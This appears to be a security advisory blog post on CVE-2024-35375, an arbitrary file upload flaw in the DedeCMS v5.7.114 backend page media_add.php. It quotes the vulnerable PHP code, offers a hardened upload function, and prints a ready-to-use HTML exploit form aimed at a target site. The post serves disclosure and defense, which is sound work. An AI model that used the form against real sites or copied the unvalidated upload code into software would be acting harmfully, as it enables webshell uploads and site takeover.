A vulnerability has been discovered in DedeCMS v5.7.114, a widely used web Content Management System (CMS) for creating and managing websites. Tracked as CVE-2024-35375, it allows attackers to upload arbitrary files through the media add PHP page in the CMS backend.

This post provides detailed information about the vulnerability, along with code snippets, links to original references, and an example of how attackers may exploit it. As always, our purpose is to raise awareness about the potential risks associated with this vulnerability and help web administrators and developers protect their systems and applications.

Arbitrary File Upload Vulnerability (CVE-2024-35375)

The vulnerability exists on the media add PHP page in the backend of DedeCMS v5.7.114. The file upload mechanism does not properly validate the user input, allowing attackers to upload and execute arbitrary files, such as PHP scripts and malware, which may lead to unauthorized access, data breaches, website defacement, and other security issues.

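The following code snippet shows the problematic part in /dede/media_add.php:

// Vulnerable: $ftype becomes the stored file's extension without any check
if (!empty($_FILES["upfile1"]['tmp_name']))
{
    $ntime = time();
    $filename = "{$cfg_basedir}/uploads/".MyDate("Ymd",$ntime) . mt_rand(100,9999) . ".$ftype";
    // The uploaded file is copied into the web-accessible uploads directory as-is
    @copy($_FILES["upfile1"]["tmp_name"], $filename);
}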

From the code above, we can see that the file type ($ftype) is not validated before the uploaded file is copied to its final destination. As a result, this opens the door for attackers to upload malicious files.
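A hardened counterpart to the snippet above, as an added example (it is not DedeCMS code and not the vendor's patch). The function name `store_media_upload`, the `ALLOWED` allow-list and the error messages are assumptions chosen for illustration.

```php
<?php
// Added example, not part of DedeCMS. ALLOWED maps each permitted extension
// to the MIME type its content must have; the list is an assumption and
// should be trimmed to what the site actually needs.
const ALLOWED = [
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
    'mp4' => 'video/mp4',
];

function store_media_upload(array $file, string $uploadDir): string
{
    // Accept only files that PHP itself received via HTTP POST without error.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }

    // The client-supplied name is used only as a key into the allow-list;
    // "shell.php.jpg" yields "jpg", and "shell.php" is rejected outright.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $expected = ALLOWED[$ext] ?? null;
    if ($expected === null) {
        throw new RuntimeException('file type not allowed');
    }

    // Check that the content matches the claimed extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $expected) {
        throw new RuntimeException('content does not match extension');
    }

    // Server-generated name: the only client-influenced part is the
    // allow-listed extension, and the random part is not guessable.
    $name = date('Ymd') . bin2hex(random_bytes(8)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0644); // readable by the web server, never executable
    return $dest;
}
```

Content sniffing can be fooled by files that are valid media and also contain script code, so the uploads directory should additionally be configured so that the web server never executes scripts from it.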

Exploit Details

An attacker can use various methods to exploit this vulnerability, from manually uploading a file using an HTML form to using automated tools that can perform multiple attempts to exploit the system. Here is an example of an HTML form that an attacker may use:

<!DOCTYPE html>
<html>
  <head>
    <title>DedeCMS Arbitrary File Upload Exploit</title>
  </head>
  <body>
    <form action="http://target_site/dede/media_add.php" enctype="multipart/form-data" method="post">
      <input type="hidden" name="action" value="add">
      <input type="hidden" name="typeid" value="107">
      <label for="file">Select a file to upload:</label>
      <input type="file" id="file" name="upfile1">
      <input type="submit" value="Upload File">
    </form>
  </body>
</html>

The form displayed above sends a POST request to the vulnerable media_add.php file in the target DedeCMS installation. Providing an appropriate malicious file in the input field of the form and submitting the form would lead to successful exploitation of the vulnerability.

References

For more information about the vulnerability and its impact, along with the possible mitigation measures, please consult the following references:

1. DedeCMS official website
2. CVE-2024-35375 MITRE entry
3. NIST National Vulnerability Database
4. Issue report on the GitHub repository

Conclusion

In light of the seriousness of this arbitrary file upload vulnerability (CVE-2024-35375), it is vital for website administrators and developers to take proper actions to address this security risk by applying any available patches or updates provided by the developers of DedeCMS. Moreover, it is crucial to keep an eye on the latest security updates and follow best practices for securing web applications in order to avoid future vulnerabilities and potential exploits.

Timeline

Published on: 05/23/2024 19:16:01 UTC
Last modified on: 11/21/2024 15:15:30 UTC